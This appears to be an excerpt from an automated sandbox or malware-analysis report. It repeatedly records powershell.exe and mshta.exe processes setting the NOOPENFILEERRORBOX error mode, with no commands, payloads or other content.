                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
